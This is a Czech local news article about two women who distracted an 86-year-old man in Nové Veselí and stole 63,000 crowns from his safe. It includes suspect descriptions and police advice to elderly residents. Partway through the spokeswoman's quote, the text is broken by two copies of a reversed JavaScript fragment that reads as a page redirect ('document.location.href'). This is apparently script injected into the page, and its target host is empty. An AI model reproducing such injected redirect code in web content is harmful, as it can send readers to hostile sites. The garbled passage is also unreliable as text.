Rainbow page separator

Dvě zlodějky okradly seniora, z trezoru mu sebraly 63 tisíc

Pondělí, 23. října 2017

Policejní auto

Nové Veselí / Do nezajištěného rodinného domku v Novém Veselí vnikly dvě neznámé ženy, aby první z nich odvedla pozornost šestaosmdesátiletého majitele domu a druhá mu mezitím odcizila peníze. „Jedna žena oslovila majitele domku a sdělila mu, že je z pojišťovny a že mu jde vyplatit částku 1 500 korun. Současně uvedla, že má pouze bankovky ve vyšších nominálních hodnotách a potřebuje peníze rozměnit. Senior ji odvedl do kuchyně a vrátil se do pokoje, kde odemkl příruční trezor a vyndal z něj dvě bankovky v hodnotě dva tisíce korun. Žena mu sdělila, že potřebuje menší bankovky, a tak si půjde rozměnit peníze jinam. Poté z domku odešla. Muž si ale všiml, že z vedlejšího pokoje odchází další žena, která předtím v místnosti nebyla. Pak zjistil, že se z trezoru ztratilo 63 tisíc korun,“ popsala policejní mluvčí Dana Čírtková.
Podle popisu, který se policistům podařilo získat, byly obě ženy snědé pleti. První byla obézní a vysoká asi 170 centimetrů, vlasy měla zakryté bílým šátkem až nad oči, měla na sobě bílou dlouhou halenu a černé kalhoty a mluvila česky. Druhá žena byla stejně vysoká, štíhlá a s rezavými vlasy v délce po ramena. Oblečeny měla dlouhé šaty rezavé barvy a rovněž mluvila česky. Podezřelé ženy měly z místa odjet v autě zřejmě Škoda Octavia Combi se slovenskou registrační značkou. „V případě, že by se dvojice pokusila o podobnou trestnou činnost někde jinde, anebo v případě, že by ji někdo spatřil, mohou lidé kontak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat tísňovou linku 158,“ upozornila mluvčí.
Policisté opět upozorňují zejména starší lidi, aby se doma zamykali, instalovali si na dveře bezpečnostní řetízek a nepouštěli dovnitř nikoho cizího, případně si nejdříve telefonicky ověřili, zda osoba za dveřmi je skutečně z instituce, na kterou se odvolává. V případě, že se cítí ohroženi, mají rovnou zavolat na tísňovou linku 158.